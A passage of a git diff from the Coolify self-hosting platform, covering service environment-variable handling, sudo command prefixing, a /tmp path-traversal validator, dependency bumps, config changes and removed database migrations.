get the name between SERVICE_URL_/SERVICE_FQDN_ and the last underscore + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceName = $strKey->after('SERVICE_URL_')->beforeLast('_')->value(); + } elseif ($strKey->startsWith('SERVICE_FQDN_')) { + $serviceName = $strKey->after('SERVICE_FQDN_')->beforeLast('_')->value(); + } else { + continue; + } + } else { + // For base variables, get everything after SERVICE_URL_/SERVICE_FQDN_ + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceName = $strKey->after('SERVICE_URL_')->value(); + } elseif ($strKey->startsWith('SERVICE_FQDN_')) { + $serviceName = $strKey->after('SERVICE_FQDN_')->value(); + } else { + continue; + } + } + + // Use lowercase key for array indexing (to group case variations together) + $serviceKey = str($serviceName)->lower()->value(); + + // Track both base service name and port-specific variant + if (! isset($serviceNamesToProcess[$serviceKey])) { + $serviceNamesToProcess[$serviceKey] = [ + 'base' => $serviceName, // Preserve original case + 'ports' => [], + ]; + } + + // If this variable has a port, track it + if ($parsed['has_port'] && $parsed['port']) { + $serviceNamesToProcess[$serviceKey]['ports'][] = $parsed['port']; + } + } + + // Delete all existing SERVICE_URL and SERVICE_FQDN variables for these service names + // We need to delete both URL and FQDN variants, with and without ports + foreach ($serviceNamesToProcess as $serviceInfo) { + $serviceName = $serviceInfo['base']; + + // Delete base variables + $resource->service->environment_variables()->where('key', "SERVICE_URL_{$serviceName}")->delete(); + $resource->service->environment_variables()->where('key', "SERVICE_FQDN_{$serviceName}")->delete(); + + // Delete port-specific variables + foreach ($serviceInfo['ports'] as $port) { + $resource->service->environment_variables()->where('key', "SERVICE_URL_{$serviceName}_{$port}")->delete(); + $resource->service->environment_variables()->where('key', "SERVICE_FQDN_{$serviceName}_{$port}")->delete(); + } + } if ($resource->fqdn) { $resourceFqdns = str($resource->fqdn)->explode(','); $resourceFqdns = $resourceFqdns->first(); - $variableName = 'SERVICE_URL_'.str($resource->name)->upper()->replace('-', '_')->replace('.', '_'); $url = Url::fromString($resourceFqdns); $port = $url->getPort(); $path = $url->getPath(); + + // Prepare URL value (with scheme and host) $urlValue = $url->getScheme().'://'.$url->getHost(); $urlValue = ($path === '/') ? $urlValue : $urlValue.$path; - $resource->service->environment_variables()->updateOrCreate([ - 'resourceable_type' => Service::class, - 'resourceable_id' => $resource->service_id, - 'key' => $variableName, - ], [ - 'value' => $urlValue, - 'is_preview' => false, - ]); - if ($port) { - $variableName = $variableName."_$port"; + + // Prepare FQDN value (host only, no scheme) + $fqdnHost = $url->getHost(); + $fqdnValue = str($fqdnHost)->after('://'); + if ($path !== '/') { + $fqdnValue = $fqdnValue.$path; + } + + // For each service name found in template, create BOTH SERVICE_URL and SERVICE_FQDN pairs + foreach ($serviceNamesToProcess as $serviceInfo) { + $serviceName = $serviceInfo['base']; + $ports = array_unique($serviceInfo['ports']); + + // ALWAYS create base pair (without port) $resource->service->environment_variables()->updateOrCreate([ 'resourceable_type' => Service::class, 'resourceable_id' => $resource->service_id, - 'key' => $variableName, + 'key' => "SERVICE_URL_{$serviceName}", ], [ 'value' => $urlValue, 'is_preview' => false, ]); - } - $variableName = 'SERVICE_FQDN_'.str($resource->name)->upper()->replace('-', '_')->replace('.', '_'); - $fqdn = Url::fromString($resourceFqdns); - $port = $fqdn->getPort(); - $path = $fqdn->getPath(); - $fqdn = $fqdn->getHost(); - $fqdnValue = str($fqdn)->after('://'); - if ($path !== '/') { - $fqdnValue = $fqdnValue.$path; - } - $resource->service->environment_variables()->updateOrCreate([ - 'resourceable_type' => Service::class, - 'resourceable_id' => $resource->service_id, - 'key' => $variableName, - ], [ - 'value' => $fqdnValue, - 'is_preview' => false, - ]); - if ($port) { - $variableName = $variableName."_$port"; + $resource->service->environment_variables()->updateOrCreate([ 'resourceable_type' => Service::class, 'resourceable_id' => $resource->service_id, - 'key' => $variableName, + 'key' => "SERVICE_FQDN_{$serviceName}", ], [ 'value' => $fqdnValue, 'is_preview' => false, ]); + + // Create port-specific pairs for each port found in template or FQDN + $allPorts = $ports; + if ($port && ! in_array($port, $allPorts)) { + $allPorts[] = $port; + } + + foreach ($allPorts as $portNum) { + $urlWithPort = $urlValue.':'.$portNum; + $fqdnWithPort = $fqdnValue.':'.$portNum; + + $resource->service->environment_variables()->updateOrCreate([ + 'resourceable_type' => Service::class, + 'resourceable_id' => $resource->service_id, + 'key' => "SERVICE_URL_{$serviceName}_{$portNum}", + ], [ + 'value' => $urlWithPort, + 'is_preview' => false, + ]); + + $resource->service->environment_variables()->updateOrCreate([ + 'resourceable_type' => Service::class, + 'resourceable_id' => $resource->service_id, + 'key' => "SERVICE_FQDN_{$serviceName}_{$portNum}", + ], [ + 'value' => $fqdnWithPort, + 'is_preview' => false, + ]); + } } } } catch (\Throwable $e) { @@ -184,3 +289,53 @@ function serviceKeys() { return get_service_templates()->keys(); } + +/** + * Parse a SERVICE_URL_* or SERVICE_FQDN_* variable to extract the service name and port. + * + * This function detects if a service environment variable has a port suffix by checking + * if the last segment after the underscore is numeric. + * + * Examples: + * - SERVICE_URL_APP_3000 → ['service_name' => 'app', 'port' => '3000', 'has_port' => true] + * - SERVICE_URL_MY_API_8080 → ['service_name' => 'my_api', 'port' => '8080', 'has_port' => true] + * - SERVICE_URL_MY_APP → ['service_name' => 'my_app', 'port' => null, 'has_port' => false] + * - SERVICE_FQDN_REDIS_CACHE_6379 → ['service_name' => 'redis_cache', 'port' => '6379', 'has_port' => true] + * + * @param string $key The environment variable key (e.g., SERVICE_URL_APP_3000) + * @return array{service_name: string, port: string|null, has_port: bool} Parsed service information + */ +function parseServiceEnvironmentVariable(string $key): array +{ + $strKey = str($key); + $lastSegment = $strKey->afterLast('_')->value(); + $hasPort = is_numeric($lastSegment) && ctype_digit($lastSegment); + + if ($hasPort) { + // Port-specific variable (e.g., SERVICE_URL_APP_3000) + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceName = $strKey->after('SERVICE_URL_')->beforeLast('_')->lower()->value(); + } elseif ($strKey->startsWith('SERVICE_FQDN_')) { + $serviceName = $strKey->after('SERVICE_FQDN_')->beforeLast('_')->lower()->value(); + } else { + $serviceName = ''; + } + $port = $lastSegment; + } else { + // Base variable without port (e.g., SERVICE_URL_APP) + if ($strKey->startsWith('SERVICE_URL_')) { + $serviceName = $strKey->after('SERVICE_URL_')->lower()->value(); + } elseif ($strKey->startsWith('SERVICE_FQDN_')) { + $serviceName = $strKey->after('SERVICE_FQDN_')->lower()->value(); + } else { + $serviceName = ''; + } + $port = null; + } + + return [ + 'service_name' => $serviceName, + 'port' => $port, + 'has_port' => $hasPort, + ]; +} diff --git a/bootstrap/helpers/shared.php b/bootstrap/helpers/shared.php index effde712a..1b23247fa 100644 --- a/bootstrap/helpers/shared.php +++ b/bootstrap/helpers/shared.php @@ -241,10 +241,9 @@ function get_latest_sentinel_version(): string function get_latest_version_of_coolify(): string { try { - $versions = File::get(base_path('versions.json')); - $versions = json_decode($versions, true); + $versions = get_versions_data(); - return data_get($versions, 'coolify.v4.version'); + return data_get($versions, 'coolify.v4.version', '0.0.0'); } catch (\Throwable $e) { return '0.0.0'; @@ -1353,52 +1352,71 @@ function parseDockerComposeFile(Service|Application $resource, bool $isNew = fal // Decide if the service is a database $image = data_get_str($service, 'image'); - $isDatabase = isDatabaseImage($image, $service); - data_set($service, 'is_database', $isDatabase); - // Create new serviceApplication or serviceDatabase - if ($isDatabase) { - if ($isNew) { - $savedService = ServiceDatabase::create([ - 'name' => $serviceName, - 'image' => $image, - 'service_id' => $resource->id, - ]); - } else { - $savedService = ServiceDatabase::where([ - 'name' => $serviceName, - 'service_id' => $resource->id, - ])->first(); - if (is_null($savedService)) { + // Check for manually migrated services first (respects user's conversion choice) + $migratedApp = ServiceApplication::where('name', $serviceName) + ->where('service_id', $resource->id) + ->where('is_migrated', true) + ->first(); + $migratedDb = ServiceDatabase::where('name', $serviceName) + ->where('service_id', $resource->id) + ->where('is_migrated', true) + ->first(); + + if ($migratedApp || $migratedDb) { + // Use the migrated service type, ignoring image detection + $isDatabase = (bool) $migratedDb; + $savedService = $migratedApp ?: $migratedDb; + } else { + // Use image detection for non-migrated services + $isDatabase = isDatabaseImage($image, $service); + + // Create new serviceApplication or serviceDatabase + if ($isDatabase) { + if ($isNew) { $savedService = ServiceDatabase::create([ 'name' => $serviceName, 'image' => $image, 'service_id' => $resource->id, ]); + } else { + $savedService = ServiceDatabase::where([ + 'name' => $serviceName, + 'service_id' => $resource->id, + ])->first(); + if (is_null($savedService)) { + $savedService = ServiceDatabase::create([ + 'name' => $serviceName, + 'image' => $image, + 'service_id' => $resource->id, + ]); + } } - } - } else { - if ($isNew) { - $savedService = ServiceApplication::create([ - 'name' => $serviceName, - 'image' => $image, - 'service_id' => $resource->id, - ]); } else { - $savedService = ServiceApplication::where([ - 'name' => $serviceName, - 'service_id' => $resource->id, - ])->first(); - if (is_null($savedService)) { + if ($isNew) { $savedService = ServiceApplication::create([ 'name' => $serviceName, 'image' => $image, 'service_id' => $resource->id, ]); + } else { + $savedService = ServiceApplication::where([ + 'name' => $serviceName, + 'service_id' => $resource->id, + ])->first(); + if (is_null($savedService)) { + $savedService = ServiceApplication::create([ + 'name' => $serviceName, + 'image' => $image, + 'service_id' => $resource->id, + ]); + } } } } + data_set($service, 'is_database', $isDatabase); + // Check if image changed if ($savedService->image !== $image) { $savedService->image = $image; @@ -3135,3 +3153,158 @@ function generateDockerComposeServiceName(mixed $services, int $pullRequestId = return $collection; } + +function formatBytes(?int $bytes, int $precision = 2): string +{ + if ($bytes === null || $bytes === 0) { + return '0 B'; + } + + // Handle negative numbers + if ($bytes < 0) { + return '0 B'; + } + + $units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']; + $base = 1024; + $exponent = floor(log($bytes) / log($base)); + $exponent = min($exponent, count($units) - 1); + + $value = $bytes / pow($base, $exponent); + + return round($value, $precision).' '.$units[$exponent]; +} + +/** + * Validates that a file path is safely within the /tmp/ directory. + * Protects against path traversal attacks by resolving the real path + * and verifying it stays within /tmp/. + * + * Note: On macOS, /tmp is often a symlink to /private/tmp, which is handled. + */ +function isSafeTmpPath(?string $path): bool +{ + if (blank($path)) { + return false; + } + + // URL decode to catch encoded traversal attempts + $decodedPath = urldecode($path); + + // Minimum length check - /tmp/x is 6 chars + if (strlen($decodedPath) < 6) { + return false; + } + + // Must start with /tmp/ + if (! str($decodedPath)->startsWith('/tmp/')) { + return false; + } + + // Quick check for obvious traversal attempts + if (str($decodedPath)->contains('..')) { + return false; + } + + // Check for null bytes (directory traversal technique) + if (str($decodedPath)->contains("\0")) { + return false; + } + + // Remove any trailing slashes for consistent validation + $normalizedPath = rtrim($decodedPath, '/'); + + // Normalize the path by removing redundant separators and resolving . and .. + // We'll do this manually since realpath() requires the path to exist + $parts = explode('/', $normalizedPath); + $resolvedParts = []; + + foreach ($parts as $part) { + if ($part === '' || $part === '.') { + // Skip empty parts (from //) and current directory references + continue; + } elseif ($part === '..') { + // Parent directory - this should have been caught earlier but double-check + return false; + } else { + $resolvedParts[] = $part; + } + } + + $resolvedPath = '/'.implode('/', $resolvedParts); + + // Final check: resolved path must start with /tmp/ + // And must have at least one component after /tmp/ + if (! str($resolvedPath)->startsWith('/tmp/') || $resolvedPath === '/tmp') { + return false; + } + + // Resolve the canonical /tmp path (handles symlinks like /tmp -> /private/tmp on macOS) + $canonicalTmpPath = realpath('/tmp'); + if ($canonicalTmpPath === false) { + // If /tmp doesn't exist, something is very wrong, but allow non-existing paths + $canonicalTmpPath = '/tmp'; + } + + // Calculate dirname once to avoid redundant calls + $dirPath = dirname($resolvedPath); + + // If the directory exists, resolve it via realpath to catch symlink attacks + if (is_dir($dirPath)) { + // For existing paths, resolve to absolute path to catch symlinks + $realDir = realpath($dirPath); + if ($realDir === false) { + return false; + } + + // Check if the real directory is within /tmp (or its canonical path) + if (! str($realDir)->startsWith('/tmp') && ! str($realDir)->startsWith($canonicalTmpPath)) { + return false; + } + } + + return true; +} + +/** + * Transform colon-delimited status format to human-readable parentheses format. + * + * Handles Docker container status formats with optional health check status and exclusion modifiers. + * + * Examples: + * - running:healthy → Running (healthy) + * - running:unhealthy:excluded → Running (unhealthy, excluded) + * - exited:excluded → Exited (excluded) + * - Proxy:running → Proxy:running (preserved as-is for headline formatting) + * - running → Running + * + * @param string $status The status string to format + * @return string The formatted status string + */ +function formatContainerStatus(string $status): string +{ + // Preserve Proxy statuses as-is (they follow different format) + if (str($status)->startsWith('Proxy')) { + return str($status)->headline()->value(); + } + + // Check for :excluded suffix + $isExcluded = str($status)->endsWith(':excluded'); + $parts = explode(':', $status); + + if ($isExcluded) { + if (count($parts) === 3) { + // Has health status: running:unhealthy:excluded → Running (unhealthy, excluded) + return str($parts[0])->headline().' ('.$parts[1].', excluded)'; + } else { + // No health status: exited:excluded → Exited (excluded) + return str($parts[0])->headline().' (excluded)'; + } + } elseif (count($parts) >= 2) { + // Regular colon format: running:healthy → Running (healthy) + return str($parts[0])->headline().' ('.$parts[1].')'; + } else { + // Simple status: running → Running + return str($status)->headline()->value(); + } +} diff --git a/bootstrap/helpers/sudo.php b/bootstrap/helpers/sudo.php index ba252c64f..b8ef84687 100644 --- a/bootstrap/helpers/sudo.php +++ b/bootstrap/helpers/sudo.php @@ -23,24 +23,56 @@ function shouldChangeOwnership(string $path): bool function parseCommandsByLineForSudo(Collection $commands, Server $server): array { $commands = $commands->map(function ($line) { - if ( - ! str(trim($line))->startsWith([ - 'cd', - 'command', - 'echo', - 'true', - 'if', - 'fi', - ]) - ) { - return "sudo $line"; + $trimmedLine = trim($line); + + // All bash keywords that should not receive sudo prefix + // Using word boundary matching to avoid prefix collisions (e.g., 'do' vs 'docker', 'if' vs 'ifconfig', 'fi' vs 'find') + $bashKeywords = [ + 'cd', + 'command', + 'declare', + 'echo', + 'export', + 'local', + 'readonly', + 'return', + 'true', + 'if', + 'fi', + 'for', + 'done', + 'while', + 'until', + 'case', + 'esac', + 'select', + 'then', + 'else', + 'elif', + 'break', + 'continue', + 'do', + ]; + + // Special case: comments (no collision risk with '#') + if (str_starts_with($trimmedLine, '#')) { + return $line; } - if (str(trim($line))->startsWith('if')) { - return str_replace('if', 'if sudo', $line); + // Check all keywords with word boundary matching + // Match keyword followed by space, semicolon, or end of line + foreach ($bashKeywords as $keyword) { + if (preg_match('/^'.preg_quote($keyword, '/').'(\s|;|$)/', $trimmedLine)) { + // Special handling for 'if' - insert sudo after 'if ' + if ($keyword === 'if') { + return preg_replace('/^(\s*)if\s+/', '$1if sudo ', $line); + } + + return $line; + } } - return $line; + return "sudo $line"; }); $commands = $commands->map(function ($line) use ($server) { @@ -58,16 +90,35 @@ function parseCommandsByLineForSudo(Collection $commands, Server $server): array $commands = $commands->map(function ($line) { $line = str($line); + + // Detect complex piped commands that should be wrapped in bash -c + $isComplexPipeCommand = ( + $line->contains(' | sh') || + $line->contains(' | bash') || + ($line->contains(' | ') && ($line->contains('||') || $line->contains('&&'))) + ); + + // If it's a complex pipe command and starts with sudo, wrap it in bash -c + if ($isComplexPipeCommand && $line->startsWith('sudo ')) { + $commandWithoutSudo = $line->after('sudo ')->value(); + // Escape single quotes for bash -c by replacing ' with '\'' + $escapedCommand = str_replace("'", "'\\''", $commandWithoutSudo); + + return "sudo bash -c '$escapedCommand'"; + } + + // For non-complex commands, apply the original logic if (str($line)->contains('$(')) { $line = $line->replace('$(', '$(sudo '); } - if (str($line)->contains('||')) { + if (! $isComplexPipeCommand && str($line)->contains('||')) { $line = $line->replace('||', '|| sudo'); } - if (str($line)->contains('&&')) { + if (! $isComplexPipeCommand && str($line)->contains('&&')) { $line = $line->replace('&&', '&& sudo'); } - if (str($line)->contains(' | ')) { + // Don't insert sudo into pipes for complex commands + if (! $isComplexPipeCommand && str($line)->contains(' | ')) { $line = $line->replace(' | ', ' | sudo '); } diff --git a/bootstrap/helpers/versions.php b/bootstrap/helpers/versions.php new file mode 100644 index 000000000..bb4694de5 --- /dev/null +++ b/bootstrap/helpers/versions.php @@ -0,0 +1,53 @@ + '3.5.6']) + */ +function get_traefik_versions(): ?array +{ + $versions = get_versions_data(); + + if (! $versions) { + return null; + } + + $traefikVersions = data_get($versions, 'traefik'); + + return is_array($traefikVersions) ? $traefikVersions : null; +} + +/** + * Invalidate the versions cache. + * Call this after updating versions.json to ensure fresh data is loaded. + */ +function invalidate_versions_cache(): void +{ + Cache::forget('coolify:versions:all'); +} diff --git a/composer.json b/composer.json index ea466049d..1db389a57 100644 --- a/composer.json +++ b/composer.json @@ -36,7 +36,7 @@ "poliander/cron": "^3.2.1", "purplepixie/phpdns": "^2.2", "pusher/pusher-php-server": "^7.2.7", - "resend/resend-laravel": "^0.19.0", + "resend/resend-laravel": "^0.20.0", "sentry/sentry-laravel": "^4.15.1", "socialiteproviders/authentik": "^5.2", "socialiteproviders/clerk": "^5.0", diff --git a/composer.lock b/composer.lock index 6320db071..b2923a240 100644 --- a/composer.lock +++ b/composer.lock @@ -4,7 +4,7 @@ "Read more about it at https://getcomposer.org/doc/01-basic-usage.md#installing-dependencies", "This file is @generated automatically" ], - "content-hash": "a993799242581bd06b5939005ee458d9", + "content-hash": "423b7d10901b9f31c926d536ff163a22", "packages": [ { "name": "amphp/amp", @@ -7048,16 +7048,16 @@ }, { "name": "resend/resend-laravel", - "version": "v0.19.0", + "version": "v0.20.0", "source": { "type": "git", "url": "https://github.com/resend/resend-laravel.git", - "reference": "ce11e363c42c1d6b93983dfebbaba3f906863c3a" + "reference": "f32c2f484df2bc65fba8ea9ab9b210cd42d9f3ed" }, "dist": { "type": "zip", - "url": "https://api.github.com/repos/resend/resend-laravel/zipball/ce11e363c42c1d6b93983dfebbaba3f906863c3a", - "reference": "ce11e363c42c1d6b93983dfebbaba3f906863c3a", + "url": "https://api.github.com/repos/resend/resend-laravel/zipball/f32c2f484df2bc65fba8ea9ab9b210cd42d9f3ed", + "reference": "f32c2f484df2bc65fba8ea9ab9b210cd42d9f3ed", "shasum": "" }, "require": { @@ -7111,9 +7111,9 @@ ], "support": { "issues": "https://github.com/resend/resend-laravel/issues", - "source": "https://github.com/resend/resend-laravel/tree/v0.19.0" + "source": "https://github.com/resend/resend-laravel/tree/v0.20.0" }, - "time": "2025-05-06T21:36:51+00:00" + "time": "2025-08-04T19:26:47+00:00" }, { "name": "resend/resend-php", @@ -9514,16 +9514,16 @@ }, { "name": "symfony/http-foundation", - "version": "v7.3.2", + "version": "v7.3.7", "source": { "type": "git", "url": "https://github.com/symfony/http-foundation.git", - "reference": "6877c122b3a6cc3695849622720054f6e6fa5fa6" + "reference": "db488a62f98f7a81d5746f05eea63a74e55bb7c4" }, "dist": { "type": "zip", - "url": "https://api.github.com/repos/symfony/http-foundation/zipball/6877c122b3a6cc3695849622720054f6e6fa5fa6", - "reference": "6877c122b3a6cc3695849622720054f6e6fa5fa6", + "url": "https://api.github.com/repos/symfony/http-foundation/zipball/db488a62f98f7a81d5746f05eea63a74e55bb7c4", + "reference": "db488a62f98f7a81d5746f05eea63a74e55bb7c4", "shasum": "" }, "require": { @@ -9573,7 +9573,7 @@ "description": "Defines an object-oriented layer for the HTTP specification", "homepage": "https://symfony.com", "support": { - "source": "https://github.com/symfony/http-foundation/tree/v7.3.2" + "source": "https://github.com/symfony/http-foundation/tree/v7.3.7" }, "funding": [ { @@ -9593,7 +9593,7 @@ "type": "tidelift" } ], - "time": "2025-07-10T08:47:49+00:00" + "time": "2025-11-08T16:41:12+00:00" }, { "name": "symfony/http-kernel", @@ -9799,16 +9799,16 @@ }, { "name": "symfony/mime", - "version": "v7.3.2", + "version": "v7.3.4", "source": { "type": "git", "url": "https://github.com/symfony/mime.git", - "reference": "e0a0f859148daf1edf6c60b398eb40bfc96697d1" + "reference": "b1b828f69cbaf887fa835a091869e55df91d0e35" }, "dist": { "type": "zip", - "url": "https://api.github.com/repos/symfony/mime/zipball/e0a0f859148daf1edf6c60b398eb40bfc96697d1", - "reference": "e0a0f859148daf1edf6c60b398eb40bfc96697d1", + "url": "https://api.github.com/repos/symfony/mime/zipball/b1b828f69cbaf887fa835a091869e55df91d0e35", + "reference": "b1b828f69cbaf887fa835a091869e55df91d0e35", "shasum": "" }, "require": { @@ -9863,7 +9863,7 @@ "mime-type" ], "support": { - "source": "https://github.com/symfony/mime/tree/v7.3.2" + "source": "https://github.com/symfony/mime/tree/v7.3.4" }, "funding": [ { @@ -9883,7 +9883,7 @@ "type": "tidelift" } ], - "time": "2025-07-15T13:41:35+00:00" + "time": "2025-09-16T08:38:17+00:00" }, { "name": "symfony/options-resolver", @@ -10195,7 +10195,7 @@ }, { "name": "symfony/polyfill-intl-idn", - "version": "v1.32.0", + "version": "v1.33.0", "source": { "type": "git", "url": "https://github.com/symfony/polyfill-intl-idn.git", @@ -10258,7 +10258,7 @@ "shim" ], "support": { - "source": "https://github.com/symfony/polyfill-intl-idn/tree/v1.32.0" + "source": "https://github.com/symfony/polyfill-intl-idn/tree/v1.33.0" }, "funding": [ { @@ -10269,6 +10269,10 @@ "url": "https://github.com/fabpot", "type": "github" }, + { + "url": "https://github.com/nicolas-grekas", + "type": "github" + }, { "url": "https://tidelift.com/funding/github/packagist/symfony/symfony", "type": "tidelift" @@ -10278,7 +10282,7 @@ }, { "name": "symfony/polyfill-intl-normalizer", - "version": "v1.32.0", + "version": "v1.33.0", "source": { "type": "git", "url": "https://github.com/symfony/polyfill-intl-normalizer.git", @@ -10339,7 +10343,7 @@ "shim" ], "support": { - "source": "https://github.com/symfony/polyfill-intl-normalizer/tree/v1.32.0" + "source": "https://github.com/symfony/polyfill-intl-normalizer/tree/v1.33.0" }, "funding": [ { @@ -10350,6 +10354,10 @@ "url": "https://github.com/fabpot", "type": "github" }, + { + "url": "https://github.com/nicolas-grekas", + "type": "github" + }, { "url": "https://tidelift.com/funding/github/packagist/symfony/symfony", "type": "tidelift" @@ -10359,7 +10367,7 @@ }, { "name": "symfony/polyfill-mbstring", - "version": "v1.32.0", + "version": "v1.33.0", "source": { "type": "git", "url": "https://github.com/symfony/polyfill-mbstring.git", @@ -10420,7 +10428,7 @@ "shim" ], "support": { - "source": "https://github.com/symfony/polyfill-mbstring/tree/v1.32.0" + "source": "https://github.com/symfony/polyfill-mbstring/tree/v1.33.0" }, "funding": [ { @@ -10431,6 +10439,10 @@ "url": "https://github.com/fabpot", "type": "github" }, + { + "url": "https://github.com/nicolas-grekas", + "type": "github" + }, { "url": "https://tidelift.com/funding/github/packagist/symfony/symfony", "type": "tidelift" @@ -10440,7 +10452,7 @@ }, { "name": "symfony/polyfill-php80", - "version": "v1.32.0", + "version": "v1.33.0", "source": { "type": "git", "url": "https://github.com/symfony/polyfill-php80.git", @@ -10500,7 +10512,7 @@ "shim" ], "support": { - "source": "https://github.com/symfony/polyfill-php80/tree/v1.32.0" + "source": "https://github.com/symfony/polyfill-php80/tree/v1.33.0" }, "funding": [ { @@ -10511,6 +10523,10 @@ "url": "https://github.com/fabpot", "type": "github" }, + { + "url": "https://github.com/nicolas-grekas", + "type": "github" + }, { "url": "https://tidelift.com/funding/github/packagist/symfony/symfony", "type": "tidelift" @@ -10520,16 +10536,16 @@ }, { "name": "symfony/polyfill-php83", - "version": "v1.32.0", + "version": "v1.33.0", "source": { "type": "git", "url": "https://github.com/symfony/polyfill-php83.git", - "reference": "2fb86d65e2d424369ad2905e83b236a8805ba491" + "reference": "17f6f9a6b1735c0f163024d959f700cfbc5155e5" }, "dist": { "type": "zip", - "url": "https://api.github.com/repos/symfony/polyfill-php83/zipball/2fb86d65e2d424369ad2905e83b236a8805ba491", - "reference": "2fb86d65e2d424369ad2905e83b236a8805ba491", + "url": "https://api.github.com/repos/symfony/polyfill-php83/zipball/17f6f9a6b1735c0f163024d959f700cfbc5155e5", + "reference": "17f6f9a6b1735c0f163024d959f700cfbc5155e5", "shasum": "" }, "require": { @@ -10576,7 +10592,7 @@ "shim" ], "support": { - "source": "https://github.com/symfony/polyfill-php83/tree/v1.32.0" + "source": "https://github.com/symfony/polyfill-php83/tree/v1.33.0" }, "funding": [ { @@ -10587,12 +10603,16 @@ "url": "https://github.com/fabpot", "type": "github" }, + { + "url": "https://github.com/nicolas-grekas", + "type": "github" + }, { "url": "https://tidelift.com/funding/github/packagist/symfony/symfony", "type": "tidelift" } ], - "time": "2024-09-09T11:45:10+00:00" + "time": "2025-07-08T02:45:35+00:00" }, { "name": "symfony/polyfill-uuid", diff --git a/conductor.json b/conductor.json index 851d13ed0..688de3a90 100644 --- a/conductor.json +++ b/conductor.json @@ -1,7 +1,7 @@ { "scripts": { "setup": "./scripts/conductor-setup.sh", - "run": "docker rm -f coolify coolify-realtime coolify-minio coolify-testing-host coolify-redis coolify-db coolify-mail coolify-vite; spin up; spin down" + "run": "docker rm -f coolify coolify-minio-init coolify-realtime coolify-minio coolify-testing-host coolify-redis coolify-db coolify-mail coolify-vite; spin up; spin down" }, "runScriptMode": "nonconcurrent" -} +} \ No newline at end of file diff --git a/config/constants.php b/config/constants.php index 02a1eaae6..893fb11fd 100644 --- a/config/constants.php +++ b/config/constants.php @@ -2,7 +2,7 @@ return [ 'coolify' => [ - 'version' => '4.0.0-beta.442', + 'version' => '4.0.0-beta.452', 'helper_version' => '1.0.12', 'realtime_version' => '1.0.10', 'self_hosted' => env('SELF_HOSTED', true), @@ -95,4 +95,27 @@ 'storage_api_key' => env('BUNNY_STORAGE_API_KEY'), 'api_key' => env('BUNNY_API_KEY'), ], + + 'server_checks' => [ + // Notification delay configuration for parallel server checks + // Used for Traefik version checks and other future server check jobs + // These settings control how long to wait before sending notifications + // after dispatching parallel check jobs for all servers + + // Minimum delay in seconds (120s = 2 minutes) + // Accounts for job processing time, retries, and network latency + 'notification_delay_min' => 120, + + // Maximum delay in seconds (300s = 5 minutes) + // Prevents excessive waiting for very large server counts + 'notification_delay_max' => 300, + + // Scaling factor: seconds to add per server (0.2) + // Formula: delay = min(max, max(min, serverCount * scaling)) + // Examples: + // - 100 servers: 120s (uses minimum) + // - 1000 servers: 200s + // - 2000 servers: 300s (hits maximum) + 'notification_delay_scaling' => 0.2, + ], ]; diff --git a/config/logging.php b/config/logging.php index 488327414..1a75978f3 100644 --- a/config/logging.php +++ b/config/logging.php @@ -129,8 +129,8 @@ 'scheduled-errors' => [ 'driver' => 'daily', 'path' => storage_path('logs/scheduled-errors.log'), - 'level' => 'debug', - 'days' => 7, + 'level' => 'warning', + 'days' => 14, ], ], diff --git a/database/migrations/2025_10_10_120000_create_cloud_init_scripts_table.php b/database/migrations/2025_10_10_120000_create_cloud_init_scripts_table.php deleted file mode 100644 index fe216a57d..000000000 --- a/database/migrations/2025_10_10_120000_create_cloud_init_scripts_table.php +++ /dev/null @@ -1,32 +0,0 @@ -id(); - $table->foreignId('team_id')->constrained()->onDelete('cascade'); - $table->string('name'); - $table->text('script'); // Encrypted in the model - $table->timestamps(); - - $table->index('team_id'); - }); - } - - /** - * Reverse the migrations. - */ - public function down(): void - { - Schema::dropIfExists('cloud_init_scripts'); - } -}; diff --git a/database/migrations/2025_10_10_120000_create_webhook_notification_settings_table.php b/database/migrations/2025_10_10_120000_create_webhook_notification_settings_table.php deleted file mode 100644 index a3edacbf9..000000000 --- a/database/migrations/2025_10_10_120000_create_webhook_notification_settings_table.php +++ /dev/null @@ -1,46 +0,0 @@ -id(); - $table->foreignId('team_id')->constrained()->cascadeOnDelete(); - - $table->boolean('webhook_enabled')->default(false); - $table->text('webhook_url')->nullable(); - - $table->boolean('deployment_success_webhook_notifications')->default(false); - $table->boolean('deployment_failure_webhook_notifications')->default(true); - $table->boolean('status_change_webhook_notifications')->default(false); - $table->boolean('backup_success_webhook_notifications')->default(false); - $table->boolean('backup_failure_webhook_notifications')->default(true); - $table->boolean('scheduled_task_success_webhook_notifications')->default(false); - $table->boolean('scheduled_task_failure_webhook_notifications')->default(true); - $table->boolean('docker_cleanup_success_webhook_notifications')->default(false); - $table->boolean('docker_cleanup_failure_webhook_notifications')->default(true); - $table->boolean('server_disk_usage_webhook_notifications')->default(true); - $table->boolean('server_reachable_webhook_notifications')->default(false); - $table->boolean('server_unreachable_webhook_notifications')->default(true); - $table->boolean('server_patch_webhook_notifications')->default(false); - - $table->unique(['team_id']); - }); - } - - /** - * Reverse the migrations. - */ - public function down(): void - { - Schema::dropIfExists('webhook_notification_settings'); - } -}; diff --git a/database/migrations/2025_10_10_120001_populate_webhook_notification_settings_for_existing_teams.php b/database/migrations/2025_10_10_120001_populate_webhook_notification_settings_for_existing_teams.php deleted file mode 100644 index de2707557..000000000 --- a/database/migrations/2025_10_10_120001_populate_webhook_notification_settings_for_existing_teams.php +++ /dev/null @@ -1,47 +0,0 @@ -get(); - - foreach ($teams as $team) { - DB::table('webhook_notification_settings')->updateOrInsert( - ['team_id' => $team->id], - [ - 'webhook_enabled' => false, - 'webhook_url' => null, - 'deployment_success_webhook_notifications' => false, - 'deployment_failure_webhook_notifications' => true, - 'status_change_webhook_notifications' => false, - 'backup_success_webhook_notifications' => false, - 'backup_failure_webhook_notifications' => true, - 'scheduled_task_success_webhook_notifications' => false, - 'scheduled_task_failure_webhook_notifications' => true, - 'docker_cleanup_success_webhook_notifications' => false, - 'docker_cleanup_failure_webhook_notifications' => true, - 'server_disk_usage_webhook_notifications' => true, - 'server_reachable_webhook_notifications' => false, - 'server_unreachable_webhook_notifications' => true, - 'server_patch_webhook_notifications' => false, - ] - ); - } - } - - /** - * Reverse the migrations. - */ - public function down(): void - { - // We don't need to do anything in down() since the webhook_notification_settings - // table will be dropped by the create migration's down() method - } -}; diff --git a/database/migrations/2025_11_09_000001_add_timeout_to_scheduled_tasks_table.php b/database/migrations/2025_11_09_000001_add_timeout_to_scheduled_tasks_table.php new file mode 100644 index 